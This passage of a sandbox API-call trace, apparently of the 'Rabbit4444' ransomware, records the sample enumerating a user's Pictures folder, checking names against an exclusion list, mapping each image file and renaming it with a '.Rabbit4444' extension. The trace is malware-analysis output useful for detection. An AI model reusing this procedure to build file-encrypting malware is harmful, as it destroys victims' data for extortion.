[0048.706] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0048.706] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0048.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0048.707] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14001751714) returned 1 [0048.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0048.707] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0048.707] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.708] CloseHandle (hObject=0x298) returned 1 [0048.708] CloseHandle (hObject=0x278) returned 1 [0048.710] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\D tDC8K.jpg.Rabbit4444") returned 47 [0048.710] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\D tDC8K.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\d tdc8k.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\D tDC8K.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\d tdc8k.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0048.710] InterlockedExchangeAdd (in: Addend=0xff618, Value=71552 | out: Addend=0xff618) returned 17781504 [0048.710] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3408 [0048.710] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0048.710] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.710] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.710] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0048.710] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0048.710] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0048.710] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0048.711] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0048.711] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0048.711] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0048.711] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0048.711] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0048.711] lstrcpyW (in: lpString1=0x130eb6a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.711] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", dwFileAttributes=0x22) returned 1 [0048.711] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", dwFileAttributes=0x6) returned 1 [0048.711] lstrlenW (lpString="desktop.ini") returned 11 [0048.711] lstrlenW (lpString="Rabbit4444") returned 10 [0048.711] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0048.711] lstrlenW (lpString=".dll") returned 4 [0048.711] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0048.711] lstrlenW (lpString=".lnk") returned 4 [0048.711] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0048.711] lstrlenW (lpString=".ini") returned 4 [0048.711] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0048.711] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d940310, ftCreationTime.dwHighDateTime=0x1d4d43f, ftLastAccessTime.dwLowDateTime=0x8c3c1c90, ftLastAccessTime.dwHighDateTime=0x1d4d039, ftLastWriteTime.dwLowDateTime=0x8c3c1c90, ftLastWriteTime.dwHighDateTime=0x1d4d039, nFileSizeHigh=0x0, nFileSizeLow=0x1742b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EdaNrSsz8PG4d9S.png", cAlternateFileName="EDANRS~1.PNG")) returned 1 [0048.711] lstrcmpiW (lpString1="EdaNrSsz8PG4d9S.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.711] lstrcmpiW (lpString1="EdaNrSsz8PG4d9S.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.711] lstrcmpiW (lpString1="EdaNrSsz8PG4d9S.png", lpString2="Rabbit4444.exe") returned -1 [0048.711] lstrcmpiW (lpString1="EdaNrSsz8PG4d9S.png", lpString2=".") returned 1 [0048.711] lstrcmpiW (lpString1="EdaNrSsz8PG4d9S.png", lpString2="..") returned 1 [0048.711] lstrcmpiW (lpString1="EdaNrSsz8PG4d9S.png", lpString2="windows") returned -1 [0048.711] lstrcmpiW (lpString1="EdaNrSsz8PG4d9S.png", lpString2="bootmgr") returned 1 [0048.711] lstrcmpiW (lpString1="EdaNrSsz8PG4d9S.png", lpString2="pagefile.sys") returned -1 [0048.712] lstrcmpiW (lpString1="EdaNrSsz8PG4d9S.png", lpString2="boot") returned 1 [0048.712] lstrcmpiW (lpString1="EdaNrSsz8PG4d9S.png", lpString2="ids.txt") returned -1 [0048.712] lstrcmpiW (lpString1="EdaNrSsz8PG4d9S.png", lpString2="NTUSER.DAT") returned -1 [0048.712] lstrcpyW (in: lpString1=0x130eb6a, lpString2="EdaNrSsz8PG4d9S.png" | out: lpString1="EdaNrSsz8PG4d9S.png") returned="EdaNrSsz8PG4d9S.png" [0048.712] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\EdaNrSsz8PG4d9S.png", dwFileAttributes=0x0) returned 1 [0048.712] lstrlenW (lpString="EdaNrSsz8PG4d9S.png") returned 19 [0048.712] lstrlenW (lpString="Rabbit4444") returned 10 [0048.712] lstrcmpiW (lpString1="PG4d9S.png", lpString2="Rabbit4444") returned -1 [0048.712] lstrlenW (lpString=".dll") returned 4 [0048.712] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0048.712] lstrlenW (lpString=".lnk") returned 4 [0048.712] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0048.712] lstrlenW (lpString=".ini") returned 4 [0048.712] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0048.712] lstrlenW (lpString=".sys") returned 4 [0048.712] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0048.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\EdaNrSsz8PG4d9S.png" (normalized: "c:\\users\\fd1hvy\\pictures\\edanrssz8pg4d9s.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.712] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.712] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14002298415) returned 1 [0048.712] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=95275) returned 1 [0048.712] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0048.712] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0048.712] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17730, lpName=0x0) returned 0x298 [0048.712] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17730) returned 0x70000 [0048.715] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.715] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0048.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.715] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.715] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0048.715] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14002596328) returned 1 [0048.723] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0048.723] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0048.723] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.724] CloseHandle (hObject=0x298) returned 1 [0048.724] CloseHandle (hObject=0x278) returned 1 [0048.727] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\EdaNrSsz8PG4d9S.png.Rabbit4444") returned 55 [0048.727] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\EdaNrSsz8PG4d9S.png" (normalized: "c:\\users\\fd1hvy\\pictures\\edanrssz8pg4d9s.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\EdaNrSsz8PG4d9S.png.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\edanrssz8pg4d9s.png.rabbit4444"), dwFlags=0x1) returned 1 [0048.728] InterlockedExchangeAdd (in: Addend=0xff618, Value=95280 | out: Addend=0xff618) returned 17853056 [0048.728] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3410 [0048.728] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0fb980, ftCreationTime.dwHighDateTime=0x1d4cc40, ftLastAccessTime.dwLowDateTime=0x88de8bd0, ftLastAccessTime.dwHighDateTime=0x1d4d42d, ftLastWriteTime.dwLowDateTime=0x88de8bd0, ftLastWriteTime.dwHighDateTime=0x1d4d42d, nFileSizeHigh=0x0, nFileSizeLow=0x12f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EsY7H_GddWmcCw.bmp", cAlternateFileName="ESY7H_~1.BMP")) returned 1 [0048.728] lstrcmpiW (lpString1="EsY7H_GddWmcCw.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.728] lstrcmpiW (lpString1="EsY7H_GddWmcCw.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.728] lstrcmpiW (lpString1="EsY7H_GddWmcCw.bmp", lpString2="Rabbit4444.exe") returned -1 [0048.728] lstrcmpiW (lpString1="EsY7H_GddWmcCw.bmp", lpString2=".") returned 1 [0048.728] lstrcmpiW (lpString1="EsY7H_GddWmcCw.bmp", lpString2="..") returned 1 [0048.728] lstrcmpiW (lpString1="EsY7H_GddWmcCw.bmp", lpString2="windows") returned -1 [0048.728] lstrcmpiW (lpString1="EsY7H_GddWmcCw.bmp", lpString2="bootmgr") returned 1 [0048.728] lstrcmpiW (lpString1="EsY7H_GddWmcCw.bmp", lpString2="pagefile.sys") returned -1 [0048.728] lstrcmpiW (lpString1="EsY7H_GddWmcCw.bmp", lpString2="boot") returned 1 [0048.728] lstrcmpiW (lpString1="EsY7H_GddWmcCw.bmp", lpString2="ids.txt") returned -1 [0048.728] lstrcmpiW (lpString1="EsY7H_GddWmcCw.bmp", lpString2="NTUSER.DAT") returned -1 [0048.728] lstrcpyW (in: lpString1=0x130eb6a, lpString2="EsY7H_GddWmcCw.bmp" | out: lpString1="EsY7H_GddWmcCw.bmp") returned="EsY7H_GddWmcCw.bmp" [0048.728] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\EsY7H_GddWmcCw.bmp", dwFileAttributes=0x0) returned 1 [0048.728] lstrlenW (lpString="EsY7H_GddWmcCw.bmp") returned 18 [0048.728] lstrlenW (lpString="Rabbit4444") returned 10 [0048.729] lstrcmpiW (lpString1="dWmcCw.bmp", lpString2="Rabbit4444") returned -1 [0048.729] lstrlenW (lpString=".dll") returned 4 [0048.729] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0048.729] lstrlenW (lpString=".lnk") returned 4 [0048.729] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0048.729] lstrlenW (lpString=".ini") returned 4 [0048.729] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0048.729] lstrlenW (lpString=".sys") returned 4 [0048.729] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0048.729] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\EsY7H_GddWmcCw.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\esy7h_gddwmccw.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.729] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.729] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14003965858) returned 1 [0048.729] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4848) returned 1 [0048.729] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0048.729] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0048.729] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15f0, lpName=0x0) returned 0x298 [0048.729] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15f0) returned 0x70000 [0048.730] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.730] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0048.730] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.730] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0048.730] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.730] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0048.730] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.730] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0048.730] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14004090251) returned 1 [0048.730] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0048.730] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0048.730] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.730] CloseHandle (hObject=0x298) returned 1 [0048.730] CloseHandle (hObject=0x278) returned 1 [0048.732] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\EsY7H_GddWmcCw.bmp.Rabbit4444") returned 54 [0048.732] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\EsY7H_GddWmcCw.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\esy7h_gddwmccw.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\EsY7H_GddWmcCw.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\esy7h_gddwmccw.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0048.732] InterlockedExchangeAdd (in: Addend=0xff618, Value=4848 | out: Addend=0xff618) returned 17948336 [0048.732] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3412 [0048.732] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd08f8780, ftCreationTime.dwHighDateTime=0x1d4d29e, ftLastAccessTime.dwLowDateTime=0x81876e00, ftLastAccessTime.dwHighDateTime=0x1d4d339, ftLastWriteTime.dwLowDateTime=0x81876e00, ftLastWriteTime.dwHighDateTime=0x1d4d339, nFileSizeHigh=0x0, nFileSizeLow=0x3214, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gjrmcE0fc5l.png", cAlternateFileName="GJRMCE~1.PNG")) returned 1 [0048.732] lstrcmpiW (lpString1="gjrmcE0fc5l.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.732] lstrcmpiW (lpString1="gjrmcE0fc5l.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.732] lstrcmpiW (lpString1="gjrmcE0fc5l.png", lpString2="Rabbit4444.exe") returned -1 [0048.732] lstrcmpiW (lpString1="gjrmcE0fc5l.png", lpString2=".") returned 1 [0048.732] lstrcmpiW (lpString1="gjrmcE0fc5l.png", lpString2="..") returned 1 [0048.732] lstrcmpiW (lpString1="gjrmcE0fc5l.png", lpString2="windows") returned -1 [0048.732] lstrcmpiW (lpString1="gjrmcE0fc5l.png", lpString2="bootmgr") returned 1 [0048.732] lstrcmpiW (lpString1="gjrmcE0fc5l.png", lpString2="pagefile.sys") returned -1 [0048.732] lstrcmpiW (lpString1="gjrmcE0fc5l.png", lpString2="boot") returned 1 [0048.733] lstrcmpiW (lpString1="gjrmcE0fc5l.png", lpString2="ids.txt") returned -1 [0048.733] lstrcmpiW (lpString1="gjrmcE0fc5l.png", lpString2="NTUSER.DAT") returned -1 [0048.733] lstrcpyW (in: lpString1=0x130eb6a, lpString2="gjrmcE0fc5l.png" | out: lpString1="gjrmcE0fc5l.png") returned="gjrmcE0fc5l.png" [0048.733] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\gjrmcE0fc5l.png", dwFileAttributes=0x0) returned 1 [0048.733] lstrlenW (lpString="gjrmcE0fc5l.png") returned 15 [0048.733] lstrlenW (lpString="Rabbit4444") returned 10 [0048.733] lstrcmpiW (lpString1="E0fc5l.png", lpString2="Rabbit4444") returned -1 [0048.733] lstrlenW (lpString=".dll") returned 4 [0048.733] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0048.733] lstrlenW (lpString=".lnk") returned 4 [0048.733] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0048.733] lstrlenW (lpString=".ini") returned 4 [0048.733] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0048.733] lstrlenW (lpString=".sys") returned 4 [0048.733] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0048.733] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\gjrmcE0fc5l.png" (normalized: "c:\\users\\fd1hvy\\pictures\\gjrmce0fc5l.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.733] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.733] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14004407970) returned 1 [0048.733] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=12820) returned 1 [0048.733] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0048.733] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0048.733] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3520, lpName=0x0) returned 0x298 [0048.734] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3520) returned 0x70000 [0048.734] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.734] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0048.734] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.734] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0048.734] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0048.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0048.735] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14004544145) returned 1 [0048.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0048.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0048.735] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.735] CloseHandle (hObject=0x298) returned 1 [0048.735] CloseHandle (hObject=0x278) returned 1 [0048.736] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\gjrmcE0fc5l.png.Rabbit4444") returned 51 [0048.736] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\gjrmcE0fc5l.png" (normalized: "c:\\users\\fd1hvy\\pictures\\gjrmce0fc5l.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\gjrmcE0fc5l.png.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\gjrmce0fc5l.png.rabbit4444"), dwFlags=0x1) returned 1 [0048.737] InterlockedExchangeAdd (in: Addend=0xff618, Value=12832 | out: Addend=0xff618) returned 17953184 [0048.737] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3413 [0048.737] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34ed6ab0, ftCreationTime.dwHighDateTime=0x1d4d44a, ftLastAccessTime.dwLowDateTime=0x6c25c9a0, ftLastAccessTime.dwHighDateTime=0x1d4d305, ftLastWriteTime.dwLowDateTime=0x6c25c9a0, ftLastWriteTime.dwHighDateTime=0x1d4d305, nFileSizeHigh=0x0, nFileSizeLow=0xb8ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HQIARmS0E7.jpg", cAlternateFileName="HQIARM~1.JPG")) returned 1 [0048.737] lstrcmpiW (lpString1="HQIARmS0E7.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.737] lstrcmpiW (lpString1="HQIARmS0E7.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.737] lstrcmpiW (lpString1="HQIARmS0E7.jpg", lpString2="Rabbit4444.exe") returned -1 [0048.737] lstrcmpiW (lpString1="HQIARmS0E7.jpg", lpString2=".") returned 1 [0048.737] lstrcmpiW (lpString1="HQIARmS0E7.jpg", lpString2="..") returned 1 [0048.737] lstrcmpiW (lpString1="HQIARmS0E7.jpg", lpString2="windows") returned -1 [0048.737] lstrcmpiW (lpString1="HQIARmS0E7.jpg", lpString2="bootmgr") returned 1 [0048.737] lstrcmpiW (lpString1="HQIARmS0E7.jpg", lpString2="pagefile.sys") returned -1 [0048.737] lstrcmpiW (lpString1="HQIARmS0E7.jpg", lpString2="boot") returned 1 [0048.737] lstrcmpiW (lpString1="HQIARmS0E7.jpg", lpString2="ids.txt") returned -1 [0048.737] lstrcmpiW (lpString1="HQIARmS0E7.jpg", lpString2="NTUSER.DAT") returned -1 [0048.737] lstrcpyW (in: lpString1=0x130eb6a, lpString2="HQIARmS0E7.jpg" | out: lpString1="HQIARmS0E7.jpg") returned="HQIARmS0E7.jpg" [0048.737] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\HQIARmS0E7.jpg", dwFileAttributes=0x0) returned 1 [0048.738] lstrlenW (lpString="HQIARmS0E7.jpg") returned 14 [0048.738] lstrlenW (lpString="Rabbit4444") returned 10 [0048.738] lstrcmpiW (lpString1="RmS0E7.jpg", lpString2="Rabbit4444") returned 1 [0048.738] lstrlenW (lpString=".dll") returned 4 [0048.738] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.738] lstrlenW (lpString=".lnk") returned 4 [0048.738] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.738] lstrlenW (lpString=".ini") returned 4 [0048.738] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.738] lstrlenW (lpString=".sys") returned 4 [0048.738] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.738] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\HQIARmS0E7.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hqiarms0e7.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.738] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.738] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14004876974) returned 1 [0048.738] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=47338) returned 1 [0048.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0048.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0048.738] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbbf0, lpName=0x0) returned 0x298 [0048.738] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbbf0) returned 0x70000 [0048.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0048.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0048.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0048.740] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: 